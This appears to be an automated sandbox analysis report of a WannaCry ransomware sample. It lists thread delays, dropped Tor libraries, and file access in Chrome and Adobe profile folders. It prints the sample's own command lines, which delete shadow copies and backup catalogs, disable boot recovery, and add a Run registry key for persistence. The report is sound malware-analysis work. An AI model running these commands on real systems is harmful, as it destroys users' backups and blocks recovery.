              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\WannaCry.exeWindow / User API: threadDelayed 1109Jump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeWindow / User API: threadDelayed 6307Jump to behavior
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeDropped PE file which has not been started: C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dllJump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeDropped PE file which has not been started: C:\Users\user\Desktop\taskse.exeJump to dropped file
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeDropped PE file which has not been started: C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dllJump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exe TID: 5936Thread sleep count: 50 > 30Jump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exe TID: 5936Thread sleep time: -50000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exe TID: 3100Thread sleep time: -45000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exe TID: 6660Thread sleep count: 64 > 30Jump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exe TID: 6660Thread sleep time: -192000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exe TID: 3392Thread sleep count: 61 > 30Jump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exe TID: 3392Thread sleep time: -1830000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exe TID: 1980Thread sleep count: 52 > 30Jump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exe TID: 1980Thread sleep time: -1560000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exe TID: 4076Thread sleep count: 1109 > 30Jump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exe TID: 4076Thread sleep time: -140000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exe TID: 5936Thread sleep count: 256 > 30Jump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exe TID: 5936Thread sleep time: -256000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exe TID: 6660Thread sleep count: 6307 > 30Jump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exe TID: 6660Thread sleep time: -18921000s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\WannaCry.exeThread sleep count: Count: 1109 delay: -10Jump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeThread delayed: delay time: 30000Jump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeThread delayed: delay time: 30000Jump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\~SD582F.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\~SD5830.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\~SD5832.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\~SD5833.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\~SD5831.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\~SD5834.tmpJump to behavior
              Source: taskhsvc.exe, 00000073.00000003.2310161809.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000073.00000002.2456824274.0000000005F19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MIGJAoGBALxlVHyDC24hGFskNP37pw07UtREIXXVayU8CnUOp+K/DlgX8HJBmul4
              Source: @WanaDecryptor@.exe, 00000052.00000002.2333463272.0000000000612000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
              Source: cscript.exe, 0000001B.00000003.1465368529.000000000062C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: taskhsvc.exe, 00000073.00000002.2347298392.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
              Source: taskhsvc.exe, 00000073.00000002.2347298392.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ
              Source: taskhsvc.exe, 00000073.00000002.2456824274.0000000005F19000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000073.00000003.2303083561.00000000013FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ntor-onion-key 7UCiHRvZFmGpW/hkq/zXOS2WcRr5hgfsNfphYCCqnHg
              Source: taskhsvc.exe, 00000073.00000002.2403162311.0000000005137000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000073.00000003.2263316082.0000000001093000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THnUCwpLWk9IsNS5IQ9PuhGfSyN1q4eb0cwCG030AGhFEgxK12y8Rq6bRLcNFnYj
              Source: @WanaDecryptor@.exe, 0000004F.00000002.2332986830.0000000000604000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000055.00000003.1588441634.00000000005C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information queried: ProcessInformation

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\System32\consent.exeMemory written: C:\Windows\System32\svchost.exe base: EBED57E528
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe vs
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "hdahtimfel691" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
              Source: C:\Windows\SysWOW64\cscript.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\consent.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Users\user\Desktop\WannaCry.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\~SDCD74.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome\~SDCD93.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable\~SDCD8E.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\~SDCD6F.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\~SDCD8D.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\~SDCD58.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable\~SDCD92.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome\~SDCD9B.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\~SDCD39.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\~SDCD73.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\~SDCD55.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\~SDCD37.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\~SDCD36.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings\~SDCD6E.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\~SDCD72.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\~SDCD90.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\~SDCD5E.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\~SD426F.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\~SDCD5D.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\~SDCD40.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\~SDCD71.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\2bbc82b6-3b49-4bb9-be61-f565e394a568\~SDCD35.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\~SDCD41.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable\~SDCD76.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\~SD5861.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\~SDCD3D.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\~SDCD5B.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\~SDCD3B.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable\~SDCD7A.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\~SDCD57.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\~SDCD3A.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome\~SDCD8F.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\~SDCD79.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\~SDCD70.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\~SDCD95.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable\~SDCD9A.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\~SDCD98.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\~SDCD75.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable\~SDCD96.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome\~SDCD77.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\~SDCD3C.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\~SDCD56.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\~SDCD99.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome\~SDCD7B.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\~SDCD38.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\~SD426E.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\~SDCD3E.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\~SDCD91.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\~SDCD5C.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\~SDCD59.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\~SDCD78.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\~SDCD3F.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\~SDCD5A.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\~SDCD42.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\~SDCD94.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\~SDCD8C.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\~SDCD34.tmpJump to behavior
